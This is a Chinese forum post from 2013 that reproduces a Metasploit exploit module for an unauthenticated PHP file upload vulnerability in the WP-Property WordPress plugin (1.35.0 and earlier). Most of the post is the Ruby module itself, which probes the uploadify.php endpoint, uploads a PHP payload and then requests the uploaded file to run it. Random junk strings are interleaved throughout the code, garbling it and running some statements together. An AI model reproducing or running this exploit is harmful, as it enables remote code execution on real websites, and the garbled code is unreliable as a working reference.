WordPress WP-Property PHP 文件上传漏洞
' s3 E7 r! H* S" w: W( K
2 N! ~) A6 Y4 I- @+ D* K2 s ## # This file is part of the Metasploit Framework and may be subject to' R4 f9 j) j6 [" X9 v, X2 e
/ }4 `: [$ O2 ^* Z$ M5 J9 i
# redistribution and commercial restrictions. Please see the Metasploit
1 v- @+ B5 `4 L/ S* U1 p. b
1 }) m# p6 {" B) }- r' H9 P( j: I5 o8 f# Framework web site for more information on licensing and terms of use.
' J8 C; t* ^% z. ` y! c# J# W5 o9 C; A6 j1 K+ [, P* P
# http://metasploit.com/framework/ ##8 w) d& U% c- a, k& J; `" f2 Z+ n
2 P) T( H+ P" T* h$ d0 q
% Y& K& `) L% Q8 S) w8 ]
5 b S3 A- U0 e$ y4 r3 @
( z, ?( t; v( C+ e# J2 q; e! a1 \$ X( }/ _" a/ {; {1 T2 O
require 'msf/core'
9 P( [( I7 i5 U: ]3 Krequire 'msf/core/exploit/php_exe'# `4 u1 ^! Z1 g' I. |
0 s4 Z& A- ?* `$ o
class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit: hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability', |3 v9 n5 ~" y; C+ [
'Description' => %q{
* T1 t: t2 `$ A% O7 S: oThis module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>. l7 w/ F, F9 L. H
[
6 [7 |) z6 \/ W9 ]( i5 k'Sammy FORGIT', # initial discovery. f) Y& V" U. s/ t5 C' N
'James Fitts <fitts.james[at]gmail.com>' # metasploit module; q' _) I/ r9 s) ]$ E. g
],/ M# Q% k1 R- ?& c& l
'License' => MSF_LICENSE,
; D6 f/ ~4 ]6 k) ^% F'References' =>
; W; F& K7 i( `6 i* \& ]) X[: }2 n3 ~6 n( n/ p; ]4 D
[ 'OSVDB', '82656' ],
& T4 }, {+ H1 J[ 'BID', '53787' ],& {! Z( J/ `2 {9 u' _ \0 e5 Z( K
[ 'EDB', '18987'],
# ?0 \" V; C6 n. C[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
0 R f* K2 L s6 p' P j],' J" N7 [. C' r
'Payload' =>
' j8 [8 G. V% z{
; A+ n& [# ~9 o'BadChars' => "\x00",
( h" Z8 [4 Z* u4 ^" o' o E},
' Z2 v' T, H8 a3 u'Platform' => 'php',) F! X- C3 O* K& A+ U- ?7 _4 }
'Arch' => ARCH_PHP,! t ?4 ~ R( n3 X
'Targets' =>
, h% w7 A s8 u[% [5 ^3 L0 q: C+ r
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
& s# ^ j: _2 c, E% H4 m' V[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]$ ?) H4 S" F" ]+ N$ j; W6 G9 f, s
],4 m: A7 t0 B K5 K. h: F+ Q
'DefaultTarget' => 0,1 l! \- X- y# t5 h
'DisclosureDate' => 'Mar 26 2012'))% T5 e; n: M- Q& V
# Y! J) x! C6 \; X0 @$ e) K
register_options(
9 q$ C$ q8 T8 B[
, ^& g' \! L- o( Z N; [3 @4 uOptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])7 l1 W$ G0 {; V3 t3 B
], self.class)
+ I* w/ `; B& [) P6 \! X/ Hend
( }; I! z. a6 \6 f4 V3 f: V! h2 Z n$ @
def check8 s; r9 [8 r" y( I
uri = target_uri.path2 K6 Z9 a }& h- i* p' N8 Q0 Y
uri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',$ i- s, f m: k) P* `/ Y5 Q
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
7 M/ c0 M1 p( y3 H& _6 q4 ^+ ~})
. V- V1 i U: C! C6 `& |- n1 }0 I: n1 g' L
if not res or res.code != 200
5 i8 w! b" g+ n$ N3 A1 m: preturn Exploit::CheckCode::Unknown
) A& @4 |3 k4 L& x. F5 \: b \end
0 y- i' V" ~8 v& N6 U# s
4 s) p' x" J, B5 W4 o8 X9 Preturn Exploit::CheckCode::Appears0 l3 S- q. y' d' X4 n3 y
end S% \ H& M( I. c/ V2 x
+ U, w! S8 Z5 B. udef exploit
8 v' _- W* [' s4 E3 N Yuri = target_uri.path
k; j/ B- D% e* Buri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)' R4 ~5 T; r8 K0 d1 [
3 u% Q+ {0 {) Q& E' z# N
data = Rex::MIME::Message.new9 U8 Z& z3 v+ p0 s1 H2 D7 `
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\""); {# w+ ~! N! h- Q, |7 s2 R
data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")( D" J, ?& _. w
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')5 x4 h g1 [+ Q4 }3 Y" f% q/ i
0 B4 u* r8 t5 d' Jprint_status("#{peer} - Uploading payload #{@payload_name}")
: w! w, \8 O6 \2 }* x) r2 Fres = send_request_cgi({
6 \$ `& j- r) N; z! i'method' => 'POST',; w, z4 s0 t8 n* U" d
'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",9 c! C1 R8 N7 d+ J* _) l
'ctype' => "multipart/form-data; boundary=#{data.bound}",
$ B2 R+ f; \# d'data' => post_data
9 \* O# }9 e% l6 q( [- t}): q; D e/ E/ R8 s" r6 i
# A, t& T) B8 N* y6 n- M! Q
if not res or res.code != 200 or res.body !~ /#{@payload_name}/
* R8 s/ S x; \' F0 Jfail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")5 v h5 [% M; `/ H& e0 i
end( @/ a% h, b3 u$ d6 J2 Q! R( x
# g& u4 k4 \0 x3 q* t3 ~: t
upload_uri = res.body
a: ~( @7 x' I) a
. G x+ C8 J* v" f0 M0 O" zprint_status("#{peer} - Executing payload #{@payload_name}")6 F: F* W! p r! N1 C
res = send_request_raw({
( N0 ~# C9 k9 k* l0 v, `'uri' => upload_uri,# e9 S% Y {# F$ ~" Z2 S/ \8 a5 P
'method' => 'GET'
& o& {5 H3 v0 k: n4 a})
; P5 o6 D/ t# I- _: mend
. Y+ u& {8 x! F1 k( B+ G' send
; F: w- j% m& Z5 r
3 x- t. b+ ]/ j8 U不要问我这写的是什么 怎么利用 我是说msf.7 u( G6 Q% c. h$ P! q! o
j+ R( F/ s1 l u |
发表于 2013-1-4 19:51:30
收藏
支持
反对